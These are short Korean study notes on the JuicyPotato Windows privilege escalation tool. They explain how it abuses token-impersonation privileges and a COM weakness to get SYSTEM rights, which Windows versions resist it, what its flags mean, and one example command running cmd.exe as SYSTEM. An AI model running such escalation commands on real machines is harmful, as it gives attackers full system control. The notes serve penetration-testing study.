JuicyPotato?
- SeImpersonate, SeAssignPrimaryToken 권한을 통한 LPE
- Windows Server 2019, Windows 10 build 1809 위로는 작동하지 않는다.
- JuicyPotato는 com 취약점을 악용하여 NT System Token을 얻고 이를 통해 프로세스를 생성하는 방식으로 동작하는데, 위 버전부터 해당 취약점이 동작하지 않아 작동이 안된다.
CheatSheet
# -l : com 요청을 수신할 포트. 안쓰이고 있는 아무 포트나 적어도 된다.
# -p : NT System 권한으로 실행할 프로그램
# -a : 실행할 프로그램에 줄 인자
# -t : process 생성에 사용할 api. *을 주면 알아서 선택해서 해준다.
## SeImpersonate -> CreateProcessWithTokenW
## SeAssignPrimaryToken -> CreateProcessAsUser
> JuicyPotato.exe -t * -p c:\\windows\\system32\\cmd.exe -a "/c whoami" -l 4444
